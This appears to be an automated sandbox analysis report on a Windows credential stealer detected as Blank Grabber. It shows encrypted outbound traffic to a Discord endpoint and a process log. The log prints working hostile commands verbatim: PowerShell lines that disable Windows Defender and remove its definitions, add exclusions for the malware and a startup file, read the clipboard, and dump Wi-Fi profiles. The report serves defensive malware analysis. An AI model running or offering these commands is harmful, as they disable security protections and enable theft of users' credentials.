                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: 07 32 26 b9 fd fe f0 cb 3a 8c 90 ce f3 29 89 c3 2a 75 38 67 b8 1b fb bd 2c e8 6e ce 48 3a cc 2f 26 82 fb 4a f7 b8 14 cb 31 f6 0c e0 5e 55 b8 5b be 37 97 47 cc 7b 08 22 cf 1d 2e d1 4f 74 35 f9 1f 66 c9 cf d6 e7 4d 5e f9 15 f1 54 05 5c 34 ac 86 e3 b7 27 33 7e b6 ec 47 7e fd 28 4b 68 c5 41 bc 0d 9a 40 3d a3 26 49 0a de aa 15 6e 6a 8e c2 85 ba 19 f2 bb aa 0b 0a 87 ca 0b 09 ba a6 79 9c 13 a7 54 cc d2 ea 5b 72 f0 c6 1e 87 14 37 02 6b 75 2c e9 df 6e d1 c3 9a 54 46 2f e0 66 18 e7 a7 0b b7 61 65 d5 a3 c5 66 7b af 78 64 53 03 25 d6 99 ee 10 5d 95 82 03 8e c7 72 7b 90 ed b3 cb 32 62 90 da 26 40 fe 5f 71 7f cd 13 1b c5 5c 3e c1 d7 24 c7 42 86 4a 1c 3b 3a a7 e9 e7 dc f5 a4 b6 05 9e 37 05 3a dd f1 42 6d 67 c8 79 52 6d 47 80 4f d5 6c 35 ac f5 4c a3 2b 08 ee 1d 05 96 cc
                                                                                                                                                                                                                                      Data Ascii: 2&:)*u8g,nH:/&J1^U[7G{".Ot5fM^T\4'3~G~(KhA@=&InjyT[r7ku,nTF/faef{xdS%]r{2b&@_q\>$BJ;:7:BmgyRmGOl5L+
                                                                                                                                                                                                                                      2025-01-04 08:42:35 UTC16384OUTData Raw: 1d 87 a5 4e b3 46 4b f5 36 3e a3 40 a1 98 d7 dd ad 9e 95 b0 c7 39 d5 c7 bc 92 c4 56 31 db b4 c2 ea 61 42 31 eb ab a1 90 26 70 ac 0d 07 85 8d e3 d0 4a 51 41 98 cb e8 eb a8 46 4d 00 da 26 e6 fc b1 0e 05 28 ec a8 32 39 a8 d9 e9 e9 e3 ba c5 bc c2 d0 ae 22 3b 23 76 d9 4a b0 29 77 65 e0 25 a2 f6 4b c7 29 7a ef 0d 65 2c 43 6f e2 9c e9 18 da cb 1f f0 4b b4 80 7a 39 87 b6 0b d7 b7 32 fe 7b c4 42 f8 0e 5a 47 5c 46 c4 4f cd 21 e1 50 75 6b c7 9a 38 86 eb 08 a2 f7 7d 9e b1 e3 b3 73 05 0f 0d 13 b5 2c ea 5f b2 44 7e 44 96 87 4d 81 ad a0 99 67 d3 bc e9 94 eb 44 f5 51 ea e4 26 27 74 7b 77 e6 75 c0 ab 0d e1 27 40 a2 9b aa 8a 84 de da 62 55 ab 89 63 00 e8 b8 7d de 5a 18 6b b9 c0 8f 2d 69 e3 d4 db 21 4d c3 93 1c ce bb 90 3b 5c b6 1c 32 5d 98 81 7b a3 3a 62 f1 36 0e 76 c6 1b
                                                                                                                                                                                                                                      Data Ascii: NFK6>@9V1aB1&pJQAFM&(29";#vJ)we%K)ze,CoKz92{BZG\FO!Puk8}s,_D~DMgDQ&'t{wu'@bUc}Zk-i!M;\2]{:b6v
                                                                                                                                                                                                                                      2025-01-04 08:42:36 UTC1251INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Date: Sat, 04 Jan 2025 08:42:36 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Content-Length: 45
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                      x-ratelimit-limit: 5
                                                                                                                                                                                                                                      x-ratelimit-remaining: 4
                                                                                                                                                                                                                                      x-ratelimit-reset: 1735980157
                                                                                                                                                                                                                                      x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vZ14Lq5OBiciWTSQo3QtMCr%2F8X6cwJ9wf3eutoNvbb0uAqGNSo93Y2pDbjSfnVuwbbq1AS6zHs60gYT3NmAAz1hSRLLxOhdM29NfzXgzgGlPkE51o6SRN96372NZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Set-Cookie: __cfruid=98f474b5012690ed569d92fa502bc01aa033d261-1735980156; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                      Set-Cookie: _cfuvid=MA7Uo7Wyd9dNQPITj.qM1rxHYjgtZpUmTVK4E25GdQk-1735980156106-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8fc9efa42c6e176c-EWR


                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:03:41:58
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\9g9LZNE4bH.exe"
                                                                                                                                                                                                                                      Imagebase:0x7ff78da50000
                                                                                                                                                                                                                                      File size:7'186'035 bytes
                                                                                                                                                                                                                                      MD5 hash:03BB5937FB7B74837DA488B2278D0811
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2028897385.000001A5F3614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2028897385.000001A5F3616000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                      Start time:03:41:58
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\9g9LZNE4bH.exe"
                                                                                                                                                                                                                                      Imagebase:0x7ff78da50000
                                                                                                                                                                                                                                      File size:7'186'035 bytes
                                                                                                                                                                                                                                      MD5 hash:03BB5937FB7B74837DA488B2278D0811
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2395753264.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2396649299.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2395270624.000001F12B657000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2400386354.000001F12B208000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                      Start time:03:42:00
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                      Start time:03:42:00
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                      Start time:03:42:00
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                      Start time:03:42:00
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                      Start time:03:42:01
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                      Start time:03:42:01
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                      Start time:03:42:01
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                      Start time:03:42:01
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                      Start time:03:42:01
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                      Start time:03:42:02
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                      Start time:03:42:02
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                      Start time:03:42:02
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                      Start time:03:42:02
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                      Start time:03:42:02
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                      Imagebase:0x7ff642e70000
                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                      Start time:03:42:02
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                      Imagebase:0x7ff642e70000
                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
